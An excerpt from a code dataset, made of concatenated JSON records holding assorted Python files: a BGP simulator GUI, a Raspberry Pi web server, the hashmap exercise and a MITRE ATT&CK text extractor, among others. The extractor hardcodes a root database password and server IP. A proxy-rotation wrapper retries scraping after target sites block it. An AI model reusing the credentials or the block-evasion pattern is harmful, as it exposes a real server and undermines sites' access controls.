self.final_route_links.append(self.final_network_canvas.add_pc_link(node2, node, False, Color(0,0,0)))\n elif sim.nodes[node].finalRoute.path[1] in sim.nodes[node].customers:\n self.final_route_links.append(self.final_network_canvas.add_pc_link(node, node2, False, Color(0,0,0)))\n elif sim.nodes[node].finalRoute.path[1] in sim.nodes[node].peers:\n self.final_route_links.append(self.final_network_canvas.add_peer_link(node, node2, False, Color(0,0,0)))\n\n\n def edit_network(self):\n self.final_network_canvas.clear()\n self.results.text = \"\"\n \n def start_over(self):\n sim.clear()\n self.results.text = \"\"\n self.dest_node.text = \"\"\n self.parent.setup.reset_text_inputs()\n self.final_network_canvas.clear()\n self.parent.setup.network_canvas.clear()\n \nclass WindowManager(ScreenManager):\n setup = ObjectProperty(None)\n sim_screen = ObjectProperty(None)\n\nkv = Builder.load_file(\"simulatorGUI.kv\")\nsim = BGPSimulator()\n\nclass BGPStudyBuddyApp(App):\n def build(self):\n return kv\n\nif __name__ == '__main__':\n BGPStudyBuddyApp().run()","sub_path":"simulatorGUI.py","file_name":"simulatorGUI.py","file_ext":"py","file_size_in_byte":14950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"110182673","text":"import RPi.GPIO as GPIO\nimport random\nfrom bottle import get,run\nimport json\nimport smbus2 as smbus\nimport time\n\n######################################################\n\nGPIO.setmode(GPIO.BCM)\nsw1 = 7\nGPIO.setup(sw1, GPIO.IN)\n\n@get(\"/sw1\")\ndef get_sw1():\n result = GPIO.input(sw1)\n ret = {}\n if result == GPIO.HIGH:\n ret[\"sw1\"] = \"HIGH\"\n else:\n ret[\"sw1\"] = \"LOW\"\n return json.dumps(ret)\n\n######################################################\n\n@get(\"/end\")\ndef get_end():\n rest = random.randint(1,100)\n content = \"貴様の命はあと\"\n content += str(rest)\n content += \"日だ\"\n return content\n\n######################################################\n\nbus = smbus.SMBus(1)\naddress = 0x48\n \n#I2C data read (block)\ndef blockread(reg, value):\n value = bus.read_i2c_block_data(address, reg, value)\n return value\n\n@get(\"/temp\")\ndef get_temp():\n temp_raw = blockread(0x00, 2)\n #温度データの整形\n temp = ((temp_raw[0] << 8 ) | temp_raw[1]) >> 4\n #分解能倍する\n temp = round(temp * 0.0625, 1)\n ret = {\"temp\": temp}\n return json.dumps(ret)\n\n#########################################################\n\nPIN = 21\nGPIO.setup(PIN, GPIO.OUT)\n\n@get(\"/led_once\")\ndef led_once():\n GPIO.output(PIN, GPIO.HIGH)\n time.sleep(3)\n GPIO.output(PIN, GPIO.LOW)\n\n#########################################################\n\nrun(host=\"0.0.0.0\", port=8080)\nGPIO.cleanup()\n","sub_path":"sample/s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"265772527","text":"from unlock.state.state import UnlockState\n\nclass FastPadState(UnlockState):\n UP = 1\n DOWN = 2\n LEFT = 3\n RIGHT = 4\n SELECT_TIME = 2\n def __init__(self):\n # Initialize the state\n super(FastPadState, self).__init__()\n self.previous_mode = \"CURSOR\"\n self.mode = \"CURSOR\"\n self.currButton = None\n self.button = None\n self.selTime = 0\n self.noop = False\n \n def process_command(self, command):\n \"\"\"\n Update the screen; called periodically on refresh.\n\n Input:\n timeDelta -- (float) Number of seconds since the\n previous call to update()\n decision -- (int) Decision, if any; one of UP, DOWN,\n LEFT, or RIGHT\n selection -- (int) 1 if a selection was made\n\n Raises an Exception if anything goes wrong.\n \"\"\"\n self.noop = False\n if command.decision == FastPadState.LEFT:\n \n self.mode = \"CURSOR\"\n self.button = self.currButton.left\n \n elif command.decision == FastPadState.RIGHT:\n self.mode = \"CURSOR\"\n self.button = self.currButton.right\n \n elif command.decision == FastPadState.UP:\n self.mode = \"CURSOR\"\n self.button = self.currButton.up\n \n elif command.decision == FastPadState.DOWN:\n self.mode = \"CURSOR\"\n self.button = self.currButton.down\n \n elif command.selection:\n self.mode = \"SELECT\"\n self.button = self.currButton\n # We've changed our selection, so reset the timer\n self.selTime = 0\n \n else:\n # If we're in selection mode, track the time\n if self.mode == \"SELECT\":\n \n # Add the time\n self.selTime += command.delta\n \n # Should we select self item?\n if self.selTime >= FastPadState.SELECT_TIME:\n \n self.selTime = 0\n self.mode = \"CURSOR\"\n self.button = self.currButton\n else:\n self.noop = True\n \n # If we're not in selection mode, reset the timer\n else:\n self.selTime = 0\n self.noop = True\n\n ","sub_path":"unlock/state/fastpad_state.py","file_name":"fastpad_state.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206485831","text":"import sys\n\nn = int(input().strip())\nexisting_scores = [int(score) for score in input().strip().split()]\nm = int(input().strip())\nlevel_scores = [int(score) for score in input().strip().split()]\n\ndef solve(old_scores, new_scores):\n unique = [] # unique values; used as a stack\n for i in range(n): # find unique scores\n if (len(unique) == 0 or unique[-1] != old_scores[i]): unique.append(old_scores[i])\n for i in range(m): # calculate rank after each level\n while unique and new_scores[i] >= unique[-1]: unique.pop() # while 'unique' is non-empty and ...\n print(len(unique)+1) # print current rank\nsolve(existing_scores, level_scores)\n","sub_path":"hackerrank/climbing-the-leaderboard.py","file_name":"climbing-the-leaderboard.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"623273965","text":"import pymysql\nimport re\nimport os\nimport rake\n\ndef getData(sql):\n test_db = pymysql.connect('211.149.217.34','root','fdsjkl0123','hy')\n cursor = test_db.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n test_db.close()\n return result\ndef arrly(list,data):\n flag=False\n for i in range(len(list)):\n if list[i][0]==data[0] and list[i][1]==data[1]:\n flag=True\n break;\n return flag\ndef replace(str):\n if str is None:\n return \"\"\n str=re.sub('\\\\<.*?\\\\>','',str)\n str=re.sub('\\\\[.*?\\\\]','',str)\n return str.replace(\"\\n\",\"\").replace(\" \",\"\")\ndef getList(pre,ent,mob):\n list=[]\n for i in range(len(pre)):\n key=replace(pre[i][0])\n value=replace(pre[i][1])\n data=[key,value]\n if not arrly(list,data) and key!=\"\" and value!=\"\":\n list.append(data)\n\n for i in range(len(ent)):\n key=replace(ent[i][0])\n value=replace(ent[i][1])\n data=[key,value]\n if not arrly(list,data) and key!=\"\" and value!=\"\":\n list.append(data)\n for i in range(len(mob)):\n key=replace(mob[i][0])\n value=replace(mob[i][1])\n data=[key,value]\n if not arrly(list,data) and key!=\"\" and value!=\"\":\n list.append(data)\n return list\ndef Title():\n pre=getData(\"SELECT T_ID,T_Title FROM Technique_PRE_ATTCK\")\n ent=getData(\"SELECT T_ID,T_Title FROM Technique_Enterprise\")\n mob=getData(\"SELECT T_ID,T_Title FROM Technique_Mobile\")\n\n list=getList(pre,ent,mob)\n for i in range(len(list)):\n with open(\"../../Data/Attributed/Technique/Title/\"+list[i][0]+\".txt\", \"w\",encoding='utf-8') as f:\n f.write(list[i][1])\ndef Description():\n pre=getData(\"SELECT T_ID,T_Descripe FROM Technique_PRE_ATTCK\")\n ent=getData(\"SELECT T_ID,T_Descripe FROM Technique_Enterprise\")\n mob=getData(\"SELECT T_ID,T_Descripe FROM Technique_Mobile\")\n list=getList(pre,ent,mob)\n for i in range(len(list)):\n with open(\"../../Data/Attributed/Technique/Description/\"+list[i][0]+\".txt\", \"w\",encoding='utf-8') as f:\n f.write(list[i][1])\ndef Procedure():\n pre=getData(\"SELECT T_ID,`T_Procedure Examples Description` FROM Technique_PRE_ATTCK\")\n ent=getData(\"SELECT T_ID,`T_Procedure Examples Description` FROM Technique_Enterprise\")\n mob=getData(\"SELECT T_ID,`T_Procedure Examples Description` FROM Technique_Mobile\")\n list=getList(pre,ent,mob)\n for i in range(len(list)):\n with open(\"../../Data/Attributed/Technique/Procedure/\"+list[i][0]+\".txt\", \"w\",encoding='utf-8') as f:\n f.write(list[i][1])\ndef line(list):\n st=[]\n for i in range(len(list)):\n key=list[i][0]\n value=str(list[i][1])\n st.append(key+\",\"+value)\n return st;\ndef key():\n stoppath = '../../Data/KeyStoplist/SmartStoplist.txt'\n\n rake_object = rake.Rake(stoppath, 1, 5, 1)\n dits=['Procedure','Title','Description']\n for j in range(len(dits)):\n files=file(\"../../Data/Attributed/Technique/\"+dits[j]+\"/\")\n for i in range(len(files)):\n sample_file = open(\"../../Data/Attributed/Technique/\"+dits[j]+\"/\"+files[i], 'r', encoding=\"utf-8\")\n text = sample_file.read()\n\n keywords = rake_object.run(text)\n str=line(keywords)\n filename=files[i];\n filename=filename[:filename.find(\".\")]\n with open(\"../../Data/Key/Technique/\"+dits[j]+\"/\"+filename+\"_key.txt\", \"w\",encoding='utf-8') as f:\n f.write(\":\".join(str))\ndef file(path):\n list=[]\n for root, dirs, files in os.walk(path):\n for f in files:\n list.append(f)\n return list\nif __name__==\"__main__\":\n #Title()\n #Description()\n #Procedure()\n key()\n #file(\"../../Data/Procedure/\")","sub_path":"Experiment/dataPreprocessing/attributedExtraction.py","file_name":"attributedExtraction.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"249298089","text":"import numpy as np\nimport smart\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.collections import LineCollection\nfrom astropy.io import fits \nimport matplotlib\nimport sys, os\nimport datetime\nmatplotlib.rcParams['text.usetex'] = False\n\ndef plotting():\n HERE = os.path.dirname(os.path.abspath(__file__))\n place = os.path.join(HERE, \"clouds\")\n\n try:\n os.mkdir(place)\n except OSError:\n pass\n\n sim = smart.interface.Smart(tag = \"earth\")\n sim.smartin.alb_file = \"composite1_txt.txt\"\n infile = \"earth_avg.pt\"\n\n HERE = os.path.dirname(os.path.abspath(__file__))\n place = os.path.join(HERE, \"clouds\")\n\n try:\n os.mkdir(place)\n except OSError:\n pass\n\n \n sim.set_run_in_place(place) \n sim.set_executables_automatically()\n \n\n\n sim.load_atmosphere_from_pt(infile, addn2 = False)\n sim.set_planet_proxima_b()\n \n\n import platform\n \n if platform.system() == 'Darwin':\n # On a Mac: usetex ok\n mpl.rc('font',**{'family':'serif','serif':['Computer Modern']})\n mpl.rcParams['font.size'] = 25.0\n mpl.rc('text', usetex=True)\n elif platform.node().startswith(\"n\"):\n # On hyak: usetex not ok, must change backend to 'agg'\n mpl.rc('font',**{'family':'serif','serif':['Computer Modern']})\n mpl.rcParams['font.size'] = 25.0\n mpl.rc('text', usetex=False)\n plt.switch_backend('agg')\n cirrus = smart.readsmart.Rad(\"clouds/_cirrus_hitran2012_5000_20000cm_toa.rad\")\n cirrus_wl = cirrus.lam\n cirrus_flux = cirrus.pflux\n cirrus_sflux = cirrus.sflux\n cirrus_flux = cirrus_flux/cirrus_sflux * ((sim.smartin.radius / sim.smartin.r_AU) **2 )\n strato = smart.readsmart.Rad(\"clouds/_strato_hitran2012_5000_20000cm_toa.rad\")\n strato_wl = strato.lam\n strato_flux = strato.pflux\n strato_sflux = strato.sflux\n strato_flux = strato_flux/strato_sflux * ((sim.smartin.radius / sim.smartin.r_AU) **2 )\n avg_wl = (cirrus_wl[:len(strato_wl)] + strato_wl)/2\n avg_flux = (cirrus_flux[:len(strato_flux)] + strato_flux)/2\n fig, ax = plt.subplots(figsize = (30, 10))\n ax.plot(avg_wl, avg_flux)\n from matplotlib import rcParams\n for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +\n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(20)\n ax.set_ylabel(\"Reflectance\")\n ax.set_xlabel(\"Wavelength ($\\mu$ m)\")\n ax.set_title(\"Earth\")\n fig.savefig(\"avg_clouds.png\", bbox_inches = 'tight')\n \nif __name__ == '__main__':\n\n import platform\n\n if platform.node().startswith(\"mox\"):\n # On the mox login node: submit job\n runfile = __file__\n smart.utils.write_slurm_script_python(runfile,\n name=\"clouds\",\n subname=\"submit.csh\",\n workdir = \"\",\n nodes = 1,\n mem = \"500G\",\n walltime = \"5:00:00\",\n ntasks = 28,\n account = \"vsm\",\n submit = True,\n rm_after_submit = True)\n elif platform.node().startswith(\"n\"):\n # On a mox compute node: ready to run\n plotting()\n else:\n # Presumably, on a regular computer: ready to run\n cirrus_wl, cirrus_flux = clouds(10, 1, 0)\n strato_wl, strato_flux = clouds(10, 0, 1)\n avg_wl = (cirrus_wl + strato_wl)/2\n avg_flux = (cirrus_flux + strato_flux)/2\n fig, ax = plt.subplots(figsize = (30, 10))\n ax.plot(avg_wl, avg_flux)\n fig.savefig(\"avg_clougs_low.png\", bbox_inches = 'tight')\n \n\n\n\n\n\n\n\n\n","sub_path":"clouds_short.py","file_name":"clouds_short.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409310596","text":"from moviepy.editor import *\n\nvideo = VideoFileClip(\"Video_1_Nina.mp4\").subclip(1,2)\n\n# Make the text. Many more options are available.\ntxt_clip = ( TextClip(\"My Holidays 2013\",fontsize=70,color='white')\n .set_position('center')\n .set_duration(10) )\n\nresult = CompositeVideoClip([video, txt_clip]) # Overlay text on video","sub_path":"week20170116Multi_Threads/movie_Py_test.py","file_name":"movie_Py_test.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"215488723","text":"\n\nfrom xai.brain.wordbase.nouns._diode import _DIODE\n\n#calss header\nclass _DIODES(_DIODE, ):\n\tdef __init__(self,): \n\t\t_DIODE.__init__(self)\n\t\tself.name = \"DIODES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"diode\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_diodes.py","file_name":"_diodes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191627665","text":"import requests\nimport hashlib\nimport os\nimport time\nimport subprocess\nfrom pathlib import Path\nurl = \"http://18.202.59.170:8080/gdpr.pdf\"\n\ndef loop():\n last_hash = \"\"\n bytes = download_file()\n last_hash = calculateSHA256(bytes)\n\n while True:\n time.sleep(2)\n bytes = download_file()\n hash = calculateSHA256(bytes)\n last_hash = hash\n print(\"Last Hash:\", hash)\n print(\"New Hash:\", hash)\n if hash != last_hash:\n print(\"!!!!FILE CHANGE DEDECTED!!!!\")\n last_hash = hash\n delete_pdf()\n write_pdf(bytes)\n print_pdf()\n\ndef delete_pdf():\n file = Path(\"pdf.pdf\")\n if file.is_file():\n os.remove(\"pdf.pdf\")\n\ndef write_pdf(bytes):\n with open('pdf.pdf', 'wb') as f:\n f.write(bytes)\n f.close()\n\ndef print_pdf():\n file = Path(\"pdf.pdf\")\n if file.is_file():\n subprocess.call([\"lpr\", \"-P\", \"Canon\", \"pdf.pdf\"])\n\ndef download_file():\n return requests.get(url).content\n\ndef calculateSHA256(bytes):\n sha256_hasher = hashlib.sha256()\n sha256_hasher.update(bytes)\n return sha256_hasher.hexdigest()\n\nloop()","sub_path":"print/print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"297480889","text":"# -*- coding: utf-8 -*-\nimport unittest2 as unittest\nimport os\nfrom zope.interface import alsoProvides\nfrom zope.component import createObject\nfrom zope.component import queryUtility\n\nfrom plone.dexterity.interfaces import IDexterityFTI\n\nfrom plone.app.testing import SITE_OWNER_NAME\nfrom plone.app.testing import SITE_OWNER_PASSWORD\nfrom plone.testing.z2 import Browser\n\nfrom wildcard.media.interfaces import IVideoEnabled\nfrom wildcard.media.browser.widget import MediaStream\n\nfrom wildcard.media.testing import (\n MEDIA_INTEGRATION_TESTING,\n MEDIA_FUNCTIONAL_TESTING\n)\n\nfrom plone.app.testing import TEST_USER_ID, setRoles\nfrom plone.app.z3cform.interfaces import IPloneFormLayer\nfrom wildcard.media.tests import getVideoBlob, test_file_dir\nfrom wildcard.media.settings import GlobalSettings\nfrom plone.rfc822.interfaces import IPrimaryFieldInfo, IPrimaryField\n\n\nclass VideoIntegrationTest(unittest.TestCase):\n\n layer = MEDIA_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n self.request['ACTUAL_URL'] = self.portal.absolute_url()\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n settings = GlobalSettings(self.portal)\n settings.additional_video_formats = []\n\n def getFti(self):\n return queryUtility(IDexterityFTI, name='WildcardVideo')\n\n def create(self, id):\n self.portal.invokeFactory('WildcardVideo', id,\n video_file=getVideoBlob('mp4'),\n video_file_ogv=getVideoBlob('ogv'),\n video_file_webm=getVideoBlob('webm'))\n return self.portal[id]\n\n def test_schema(self):\n fti = self.getFti()\n schema = fti.lookupSchema()\n self.assertEqual(schema.getName(), 'plone_0_WildcardVideo')\n\n def test_fti(self):\n fti = self.getFti()\n self.assertNotEquals(None, fti)\n\n def test_factory(self):\n fti = self.getFti()\n factory = fti.factory\n new_object = createObject(factory)\n self.assertTrue(IVideoEnabled.providedBy(new_object))\n\n def test_adding(self):\n self.create('video1')\n self.assertTrue(IVideoEnabled.providedBy(self.portal['video1']))\n\n def test_view(self):\n self.create('video2')\n video = self.portal['video2']\n video.title = \"My video\"\n video.description = \"This is my video.\"\n self.request.set('URL', video.absolute_url())\n self.request.set('ACTUAL_URL', video.absolute_url())\n alsoProvides(self.request, IPloneFormLayer)\n view = video.restrictedTraverse('@@view')\n\n result = view()\n self.assertTrue(result)\n self.assertEqual(view.request.response.status, 200)\n self.assertTrue('My video' in result)\n self.assertTrue('This is my video.' in result)\n self.assertIn(\n '++widget++form.widgets.IVideo.video_file/@@download/test.mp4',\n result)\n self.assertIn(\n '++widget++form.widgets.IVideo.video_file_ogv/@@download/test.ogv',\n result)\n self.assertIn(\n '++widget++form.widgets.IVideo.video_file_webm/@@download/test.webm',\n result)\n\n def test_media_range_request(self):\n self.create('video3')\n video = self.portal['video3']\n alsoProvides(self.request, IPloneFormLayer)\n view = video.restrictedTraverse('@@view')\n view()\n\n widget = view.widgets.get('IVideo.video_file')\n stream = MediaStream(widget, self.request)\n\n stream()\n self.assertEqual(self.request.response.status, 200)\n self.assertNotIn('Content-Range', self.request.response.headers)\n\n for start in (0, 1000, 2000):\n self.request.environ['HTTP_RANGE'] = 'bytes=%i-' % start\n stream()\n # Partial content responses for ranges\n self.assertEqual(self.request.response.status, 206)\n self.assertEqual(self.request.response.getHeader('Accept-Ranges'),\n 'bytes')\n content_range = self.request.response.getHeader('Content-Range')\n self.assertIsNotNone(content_range)\n self.assertTrue(content_range.startswith('bytes %i-' % start))\n\n def test_primary_field(self):\n video = self.create('video')\n info = IPrimaryFieldInfo(video)\n self.assertEquals(info.fieldname, 'video_file')\n self.assertTrue(IPrimaryField.providedBy(info.field))\n\n\nclass VideoFunctionalTest(unittest.TestCase):\n\n layer = MEDIA_FUNCTIONAL_TESTING\n\n def setUp(self):\n app = self.layer['app']\n self.portal = self.layer['portal']\n settings = GlobalSettings(self.portal)\n settings.additional_video_formats = []\n self.request = self.layer['request']\n self.portal_url = self.portal.absolute_url()\n self.browser = Browser(app)\n self.browser.handleErrors = False\n self.browser.addHeader(\n 'Authorization',\n 'Basic %s:%s' % (SITE_OWNER_NAME, SITE_OWNER_PASSWORD,)\n )\n\n def test_add_video(self):\n self.browser.open(self.portal_url)\n self.browser.getLink('Video').click()\n self.browser.getControl(\n name='form.widgets.IDublinCore.title').value = \"My video\"\n self.browser.getControl(\n name='form.widgets.IDublinCore.description')\\\n .value = \"This is my video.\"\n file_path = os.path.join(test_file_dir, \"test.mp4\")\n file_ctl = self.browser.getControl(\n name='form.widgets.IVideo.video_file')\n file_ctl.add_file(open(file_path), 'video/mp4', 'test.mp4')\n self.browser.getControl('Save').click()\n self.assertTrue('My video' in self.browser.contents)\n self.assertTrue('This is my video' in self.browser.contents)\n self.assertTrue('= len:\n index = 0\n\n return self.ipList[index]\n\n def getSize(self):\n if self.ipList is None:\n raise Exception\n return len(self.ipList)\n\n def update_ipList(self):\n self.get_all_IP(self.collection_name)\n\n def update_ip_pool(self):\n logger.info(\"开始执行更新IP代理池中的IP并从网上抓取新的IP放入池中\")\n start_time = time.time()\n check()\n execute_spider()\n end_time = time.time()\n logger.info(\"刷新数据库中IP带内存中来\")\n self.update_ipList()\n logger.info(\"IP代理池更新完毕.. 使用时间为 {} 秒\".format(end_time - start_time))\n\n def _request_with_proxy(self,url,use_proxy):\n\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"User-Agent\": random.choice(PC_USER_AGENTS)\n }\n\n # 获取进入while循环的初始时间\n start_time = time.time()\n while True:\n\n # 获取当前时间和之前的初始时间做比较,如果超出自定义的时间则raise requests.exceptions.ProxyError\n end_time = time.time()\n if int(end_time - start_time) > proxy_timeout:\n logger.info(\n \"request with proxy 方法时间执行过长 可能原因: IP池内IP全部失效或被目标网站封掉IP其他异常错误 当前ip为 {} 程序进行休息状态 休息时长为: {} 秒\".format(\n self.current_ip, proxy_timeout))\n time.sleep(proxy_timeout)\n self.update_ip_pool()\n msg = \"IP代理池休息完毕并更新 请重新进行数据抓取 可能原因: 查找历史日志 当前ip为 {}\".format(self.current_ip)\n raise requests.exceptions.ProxyError(msg)\n proxy = {\n 'http': self.current_ip,\n 'https': self.current_ip\n }\n\n if use_proxy:\n try:\n response = requests.get(url, proxies=proxy, timeout=request_timeout, headers=headers)\n code = response.status_code\n msg = \"doing http request successfully current proxy ip is {} status_code :{}\".format(self.current_ip, code)\n logger.info(msg)\n\n if code == 404:\n msg = \" 404 Client Error: Not Found for url:{}\".format(url)\n logger.info(msg)\n return response\n\n response.raise_for_status()\n if code == 200 and custom_filter_str != '' and custom_filter_str in response.text:\n raise Exception\n\n return response\n except requests.HTTPError as e:\n logger.info(e)\n self.current_ip = self.getRandomOne()\n msg = \"random pick a ip from ipList new ip is {}\".format(self.current_ip)\n logger.info(msg)\n except Exception as e:\n print(e)\n msg = \"ip is {} can't use \".format(self.current_ip)\n logger.info(msg)\n self.current_ip = self.getRandomOne()\n msg = \"random pick a ip from ipList new ip is {}\".format(self.current_ip)\n logger.info(msg)\n else:\n try:\n response = requests.get(url, timeout=request_timeout, headers=headers)\n return response\n except Exception as e:\n msg = \"ip is {} can't use \".format(self.current_ip)\n logger.info(msg)\n self.current_ip = self.getRandomOne()\n msg = \"random pick a ip from ipList new ip is {}\".format(self.current_ip)\n logger.info(msg)\n\n\n\n","sub_path":"Request/MainRequest.py","file_name":"MainRequest.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"466600425","text":"''' service.py\n\n Server side service\n \n Extend this class to create a service.\n'''\n\nclass Service(object):\n \n def __init__(self):\n # Initialize the service container that contains this service as None\n # This will be populated with the correct value when the service\n # is registered with container.register_service(service)\n self._container = None\n\n def handle_request(self, client_id, request):\n ''' Handle a request message\n \n It's not necessary to implement this handler. The default\n implementation will take the 'command' property from the \n request message and attempt to execute it as a function,\n passing the 'args' property as arguments\n \n Params\n ======\n client_id : string\n Identifier for this client (should this be session instead?)\n request : dictionary\n Example \n { \n 'path' : '/path/to/this/service', \n 'command' : 'method_to_invoke', \n 'args' : { } # args to pass to method\n }\n '''\n command = request['command']\n try:\n self._client_id = client_id\n func = getattr(self, command)\n response = func(**request['args'])\n except:\n response = { 'status' : 'error', 'message' : traceback.format_exc() }\n finally:\n self._client_id = None\n\n return response\n","sub_path":"src/zen/fabric/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"425514676","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author : Thistledown\n@Contact : 120768091@qq.com\n@Software: PyCharm\n@File : hashmap.py\n@Time : 2018/9/11 21:31\n\"\"\"\n'定义自己的字典类'\n'''\n用list来创建一个字典数据结构hashmap\n'''\n\n'hashmap:拥有键值对的有插槽的列表' \\\n'aMap:一个列表变量' \\\n\n\n\ndef new(num_buckets=256): # 即hashmap.new()\n '''Initializes a Map with the given number of buckets'''\n '''用给定数目的bucket(存储空间)初始化一个Map(映射)。'''\n # 以下为官方文档中给出的解释\n '> 首先,创建一个函数来生成一个hashmap(初始化)' \\\n '> 先创建一个包含列表的变量,叫做aMap,然后把num_buckets(用以存放给hashmap设置的内容)放进去'\n aMap = [] # aMap是一个list\n for i in range(0, num_buckets):\n aMap.append([]) # 列表aMap的每一个元素都是一个列表\n return aMap\n\ndef hash_key(aMap, key): # 即hashmap.hash_key(key)\n '''Given a key this will create a number and\n then convert it to an index for the aMap\\'s buckets.'''\n '给定一个键值,hash_key()会返回一个可以用作索引的哈希值'\n '> hash_key是一个dict如何工作的核心。' \\\n '> 用Python内建的哈希函数(hash)将字符串(key)转换为数字' \\\n '> hash(key)即为key对应的数字,使用模除(%)操作和len(aMap)来获得一个放置这个key的位置' \\\n '> 模除(%)操作将会返回除法操作的余数,可以用来限制大数,将其转换为较小的一组数字'\n return hash(key) % len(aMap) # 利用模除(%)操作,将这个哈希值转换为bucket的索引\n# hash()用于获取一个对象(字符串或者数值等)的哈希值\n\ndef get_bucket(aMap, key): # 即hashmap.get_bucket(key)\n '''Given a key, find the bucket where it would go.'''\n '给定一个键值,将作为其索引的哈希值存储在映射list:aMap中'\n '> get_bucket函数使用hash_key来找到一个key所在的“bucket”' \\\n '> 无论获得哪一个bucket_id都会填充进aMap列表中,使用bucket_id可以找打一个key所在的“bucket”'\n bucket_id = hash_key(aMap, key) # bucket_id是一个哈希值,作为键值对的索引\n return aMap[bucket_id]\n\ndef get_slot(aMap, key, default=None):\n '''\n Returns the index, key, and value of a slot found in a bucket.\n Returns -1, key, and default (None if not set) when not found.\n '''\n '> get_slot函数使用get_bucket来获得一个key所在的“bucket”' \\\n '> 通过查找bucket中的每一个元素来找到对应的key。找到对应的key之后,它会返回一个这样的元组(i,k,v)' \\\n '> i表示的是key的索引值,k就是key本身,v就是key对应的值'\n bucket = get_bucket(aMap, key)\n for i, kv in enumerate(bucket):\n # enumerate()函数用于将一个可遍历的数据对象组合为一个索引序列,同时列出数据和数据下标,一般用在for循环中\n # i:index(索引); kv:bucket中的元素,由key(键值,k)和value(键对应的值,v)(bucket是一个列表,也是aMap中的一个元素)\n k, v = kv\n if key == k:\n return i, k, v # 返回index(索引),key(键),value(值)\n\n return -1, key, default\n\n'类似于dict.get(key, default=None),返回指定键的值,如果值不存在则返回default值'\ndef get(aMap, key, default=None):\n '''Gets the value in a bucket for the given key, or the default.'''\n '> get这是一个人们需要hashmap的最方便的函数。' \\\n '> 它使用get_slot来获得元组(i,k,v),但只是返回v。'\n i, k, v = get_slot(aMap, key, default=default)\n return v\n\ndef set(aMap, key, value): # 即hashmap.set(key, value)\n '''Sets the key to the value, replacing any existing value.'''\n \"给字典aMap赋予一组键值key=>value\"\n '> set设置一个key/value 键/值对,并将其追加到字典中,保证以后再用到时可以获取得到' \\\n '> 为保证hashmap中的每个key只存储一次:首先要找到这个key是否已经存在' \\\n '> 如果存在,会替换其原来的值;如果不存在,则会追加进来'\n bucket = get_bucket(aMap, key)\n i, k, v = get_slot(aMap, key) # i,k,v分别是index,key和value\n\n if i >= 0:\n # the key exists, replace it\n # 如果key存在,替换之\n bucket[i] = (key, value)\n else:\n # the key does not, append to create it\n # 如果键key不存在,则增加\n bucket.append((key, value))\n\n'删除字典中指定键的值'\ndef delete(aMap, key):\n '''Deletes the given key from the Map.'''\n '> delete 删除一个key:找到key对应的bucket,并将其从列表中删除' \\\n\n bucket = get_bucket(aMap, key)\n\n for i in range(len(bucket)):\n k, v = bucket[i]\n if key == k:\n del bucket[i] # 使用del语句来删除列表中的元素(删除列表bucket中索引为i的元素)\n break # 用于终止循环语句,用在while和for循环中\n\n'打印出字典中的元素'\ndef list(aMap):\n '''Prints out what\\'s in the Map.'''\n for bucket in aMap:\n if bucket:\n for k, v in bucket:\n # print(k, v)\n print('\\'', k, '\\':', v)\n\n","sub_path":"ch3/hashmap.py","file_name":"hashmap.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"399392342","text":"from datetime import datetime\n\ndef strToHexArray(hexstr):\n\treturn [hexstr[i:i+2] for i in range(0, len(hexstr), 2)]\n\ndef get_week_data_hex_str():\n return \"24FA\"\n\ndef get_time_query_hex_str(timestr):\n # format \"yyyy mm dd hh\"\n hexArray = timestr.split(\" \")\n year = format(int(hexArray[0]), 'x')\n month = format(int(hexArray[1]), 'x')\n day = format(int(hexArray[2]), 'x')\n if hexArray[3] is not None:\n \thour = format(int(hexArray[3]), 'x')\n \thexstr = \"2401\" + year + month + day + hour\n else:\n \thexstr = \"2402\" + year + month + day\n \t\n return hexstr\n\ndef parse_battery(hexArray):\n\treturn int(hexArray[1], 16)\n\ndef parse2Data(hexArray):\n print(hexArray)\n data = {}\n for batch in range(3):\n i = batch * 6 + 2\n minute = int(hexArray[i+0], 16)\n second = int(hexArray[i+1], 16)\n heart_rate = int(hexArray[i+2], 16)\n temperature = float(int(\"\".join(hexArray[i+3:i+5]), 16) / 100)\n moving = int(hexArray[i+5], 16)\n \n data[batch] = {\n 